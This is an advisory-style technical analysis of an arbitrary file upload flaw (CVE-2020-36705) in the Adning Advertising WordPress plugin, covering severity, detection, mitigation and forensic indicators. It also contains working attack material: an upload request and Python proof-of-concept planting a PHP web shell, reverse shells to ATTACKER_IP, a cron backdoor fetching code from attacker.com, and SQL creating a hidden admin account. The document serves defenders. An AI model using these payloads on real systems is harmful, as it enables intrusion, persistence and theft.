Comprehensive Technical Analysis of CVE-2020-36705

Adning Advertising Plugin for WordPress – Arbitrary File Upload Vulnerability

1. Vulnerability Assessment & Severity Evaluation

Overview

CVE-2020-36705 is a critical-severity arbitrary file upload vulnerability in the Adning Advertising (WP Pro Advertising System) plugin for WordPress, affecting versions up to and including 1.5.5. The flaw stems from missing file type validation in the _ning_upload_image function, allowing unauthenticated attackers to upload malicious files to the server. This can lead to remote code execution (RCE), full system compromise, and persistent backdoor access.

CVSS Score & Metrics

• CVSS v3.1 Base Score: 9.8 (Critical)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Breakdown:
    • Attack Vector (AV:N): Network-based exploitation (remote attack)
    • Attack Complexity (AC:L): Low (no special conditions required)
    • Privileges Required (PR:N): None (unauthenticated)
    • User Interaction (UI:N): None
    • Scope (S:U): Unchanged (impact confined to vulnerable component)
    • Confidentiality (C:H): High (full data exposure possible)
    • Integrity (I:H): High (arbitrary code execution)
    • Availability (A:H): High (server takeover possible)

Severity Justification

• Unauthenticated RCE: The vulnerability does not require authentication, making it trivially exploitable by any attacker with network access.
• Low Exploitation Complexity: No special conditions (e.g., user interaction, specific configurations) are needed.
• High Impact: Successful exploitation can lead to full server compromise, data exfiltration, defacement, or lateral movement within a network.
• Active Exploitation: Reports indicate in-the-wild exploitation, increasing urgency for mitigation.

---

2. Potential Attack Vectors & Exploitation Methods

Exploitation Workflow

1. Identify Vulnerable Targets

   • Attackers scan for WordPress sites running Adning Advertising ≤1.5.5 using:
     • WPScan (wpscan --url <target> --enumerate vp)
     • Shodan/Censys (http.html:"Adning Advertising")
     • Manual HTTP requests (e.g., checking /wp-content/plugins/adning-advertising/)

2. Craft Malicious File Upload Request

   • The _ning_upload_image function processes file uploads without proper validation, allowing:
     • PHP files (e.g., shell.php, backdoor.php)
     • Web shells (e.g., c99.php, r57.php)
     • Reverse shells (e.g., bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1')
   • Example Exploit Request (PoC):

     POST /wp-admin/admin-ajax.php?action=ning_upload_image HTTP/1.1
     Host: vulnerable-site.com
     Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
     
     ------WebKitFormBoundary
     Content-Disposition: form-data; name="file"; filename="shell.php"
     Content-Type: application/octet-stream
     
     <?php system($_GET['cmd']); ?>
     ------WebKitFormBoundary--
     

3. Execute Arbitrary Code

   • Once uploaded, the attacker accesses the file (e.g., https://vulnerable-site.com/wp-content/uploads/adning/shell.php?cmd=id).
   • Post-exploitation actions may include:
     • Privilege escalation (e.g., via sudo misconfigurations, kernel exploits)
     • Persistence mechanisms (e.g., cron jobs, hidden admin users)
     • Lateral movement (e.g., database dumping, internal network scanning)
     • Data exfiltration (e.g., via curl, wget, or DNS exfiltration)

Real-World Exploitation Scenarios

• Automated Botnets: Mass exploitation via Mirai-like or WordPress-specific botnets (e.g., Kinsing, Cloud9).
• Targeted Attacks: APT groups leveraging the flaw for initial access in larger campaigns.
• Cryptojacking: Deploying XMRig or other miners to hijack server resources.
• Ransomware: Encrypting site files and demanding payment (e.g., REvil, LockBit).

---

3. Affected Systems & Software Versions

Vulnerable Software

• Plugin Name: Adning Advertising (WP Pro Advertising System)
• Vendor: CodeCanyon (Envato Market)
• Affected Versions: ≤1.5.5
• Patched Version: 1.5.6+ (released July 2020)

Impacted Environments

• WordPress Websites: Any site using the vulnerable plugin.
• Hosting Providers: Shared hosting environments where multiple sites may be affected.
• Enterprise CMS: Organizations using WordPress for marketing or internal portals.

Detection Methods

• Manual Check:

  curl -s https://<target>/wp-content/plugins/adning-advertising/readme.txt | grep "Stable tag"
  

• Automated Scanning:
  • WPScan:

    wpscan --url <target> --enumerate vp --plugins-detection aggressive
    

  • Nmap NSE Script:

    nmap -p 80,443 --script http-wordpress-enum <target>
    

  • Burp Suite / OWASP ZAP: Intercepting upload requests to /wp-admin/admin-ajax.php?action=ning_upload_image.

---

4. Recommended Mitigation Strategies

Immediate Actions

1. Upgrade the Plugin

   • Patch to version 1.5.6 or later (released July 2020).
   • Verify integrity of the update to ensure no backdoors were introduced.

2. Disable the Plugin (If Upgrade Not Possible)

   • Temporarily deactivate the plugin via:

     wp plugin deactivate adning-advertising --path=/var/www/html
     

   • Remove the plugin directory if not in use:

     rm -rf /var/www/html/wp-content/plugins/adning-advertising/
     

3. Apply Virtual Patching (WAF Rules)

   • ModSecurity Rules (OWASP CRS):

     SecRule REQUEST_FILENAME "@contains ning_upload_image" \
       "id:1000,\
       phase:1,\
       deny,\
       status:403,\
       msg:'Blocked Adning Advertising File Upload Exploit'"
     

   • Cloudflare WAF:
     • Create a custom rule to block requests to /wp-admin/admin-ajax.php?action=ning_upload_image.
   • AWS WAF / Azure WAF:
     • Deploy a SQLi/XSS/file upload rule to block malicious payloads.

4. File Integrity Monitoring (FIM)

   • Monitor /wp-content/uploads/adning/ for unauthorized file changes.
   • Tools:
     • OSSEC / Wazuh (for real-time alerts)
     • Tripwire / AIDE (for periodic scans)

5. Network-Level Protections

   • Restrict access to /wp-admin/ and /wp-content/ via .htaccess:

     <FilesMatch "\.(php|php5|phtml)$">
       Order Deny,Allow
       Deny from all
     </FilesMatch>
     

   • Disable PHP execution in upload directories:

     <Directory "/wp-content/uploads/adning/">
       php_flag engine off
     </Directory>
     

Long-Term Hardening

1. Principle of Least Privilege (PoLP)

   • Restrict file upload permissions to non-executable directories.
   • Use chmod 640 for sensitive files.

2. Regular Vulnerability Scanning

   • Automated tools:
     • Nessus / OpenVAS (for CVE detection)
     • WPScan (for WordPress-specific vulnerabilities)
   • Manual audits of plugin code (e.g., checking ning_upload_image function).

3. Web Application Firewall (WAF) Deployment

   • Recommended WAFs:
     • Cloudflare Enterprise
     • AWS WAF + Shield
     • ModSecurity (with OWASP CRS)

4. Incident Response Planning

   • Develop a playbook for WordPress plugin vulnerabilities.
   • Isolate compromised systems and perform forensic analysis (e.g., using Autopsy, Volatility).

---

5. Impact on the Cybersecurity Landscape

Broader Implications

1. WordPress Ecosystem Risks

   • ~43% of all websites run WordPress, making plugin vulnerabilities high-impact.
   • Supply chain attacks via compromised plugins (e.g., FakeUpdates, SocGholish).

2. Exploitation Trends

   • Increased targeting of WordPress plugins (e.g., Elementor, WooCommerce, Contact Form 7).
   • Automated exploitation via botnets (e.g., Kinsing, Mirai variants).

3. Regulatory & Compliance Risks

   • GDPR / CCPA violations if customer data is exfiltrated.
   • PCI DSS non-compliance if payment systems are compromised.

4. Threat Actor Motivations

   • Financial gain (cryptojacking, ransomware).
   • Espionage (APT groups targeting corporate WordPress sites).
   • Hacktivism (defacement, data leaks).

Historical Context

• Similar Vulnerabilities:
  • CVE-2021-24284 (Kali Forms – Arbitrary File Upload)
  • CVE-2020-25213 (File Manager – RCE)
  • CVE-2019-9978 (Social Warfare – RCE)
• Lessons Learned:
  • Plugin developers must enforce strict file validation.
  • WordPress site owners must prioritize patch management.

---

6. Technical Details for Security Professionals

Root Cause Analysis

• Vulnerable Function: _ning_upload_image (located in adning-advertising/includes/ajax.php).
• Missing Validation:
  • No file extension checks (e.g., .php, .phtml).
  • No MIME type verification (e.g., image/jpeg vs. application/x-php).
  • No file content inspection (e.g., PHP code in image files).

Exploit Code (Proof of Concept)

import requests

target = "http://vulnerable-site.com"
url = f"{target}/wp-admin/admin-ajax.php?action=ning_upload_image"

files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
}

response = requests.post(url, files=files)
print(response.text)  # Should return the uploaded file path

Post-Exploitation Techniques

1. Web Shell Deployment

   • Simple PHP shell:

     <?php system($_GET['cmd']); ?>
     

   • Advanced shells (e.g., Weevely, Laudanum):

     weevely generate password123 shell.php
     

2. Reverse Shell

   • Bash reverse shell:

     bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
     

   • Python reverse shell:

     python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
     

3. Persistence Mechanisms

   • Cron job backdoor:

     (crontab -l 2>/dev/null; echo "@reboot /usr/bin/php -r 'eval(file_get_contents(\"http://attacker.com/shell.txt\"));'") | crontab -
     

   • Hidden admin user:

     INSERT INTO wp_users (user_login, user_pass, user_email, user_registered, user_status) VALUES ('hacker', MD5('password123'), 'hacker@evil.com', NOW(), 0);
     INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (LAST_INSERT_ID(), 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
     

Forensic Indicators of Compromise (IOCs)

Indicator Type	Example
File Paths	/wp-content/uploads/adning/shell.php
Network Connections	Outbound connections to attacker.com:4444
Log Entries	POST /wp-admin/admin-ajax.php?action=ning_upload_image (unusual user-agent)
Processes	php -r 'eval(file_get_contents("http://attacker.com/shell.txt"));'
Modified Files	.htaccess changes, new .php files in uploads directory

Detection & Hunting Queries

• SIEM Rules (Splunk / ELK):

  index=web_logs uri_path="/wp-admin/admin-ajax.php" action=ning_upload_image
  | stats count by src_ip, user_agent
  | where count > 5
  

• YARA Rule (for uploaded PHP shells):

  rule WordPress_PHP_WebShell {
      meta:
          description = "Detects common PHP web shells in WordPress uploads"
      strings:
          $php_eval = "eval("
          $php_system = "system("
          $php_exec = "exec("
          $php_shell_exec = "shell_exec("
      condition:
          any of them
  }
  

• OSQuery (for suspicious processes):

  SELECT * FROM processes WHERE
  cmdline LIKE '%php%' AND
  cmdline LIKE '%eval(%' OR
  cmdline LIKE '%system(%';
  

---

Conclusion & Key Takeaways

Summary of Risks

• Critical RCE vulnerability in a widely used WordPress plugin.
• Unauthenticated exploitation with low complexity.
• Active in-the-wild attacks reported by Wordfence & NinTechNet.

Actionable Recommendations

1. Patch immediately to Adning Advertising 1.5.6+.
2. Deploy WAF rules to block exploitation attempts.
3. Monitor for IOCs (unusual file uploads, reverse shells).
4. Conduct a forensic review if compromise is suspected.
5. Educate WordPress administrators on plugin security best practices.

Final Thoughts

CVE-2020-36705 exemplifies the persistent threat posed by third-party WordPress plugins. Organizations must adopt a proactive security posture, including automated patching, WAF deployment, and continuous monitoring, to mitigate such high-risk vulnerabilities. Failure to address this flaw could result in catastrophic breaches, particularly in e-commerce, healthcare, and financial sectors where WordPress is prevalent.

References:

• Wordfence Advisory
• NinTechNet Exploitation Report
• WPScan Vulnerability Database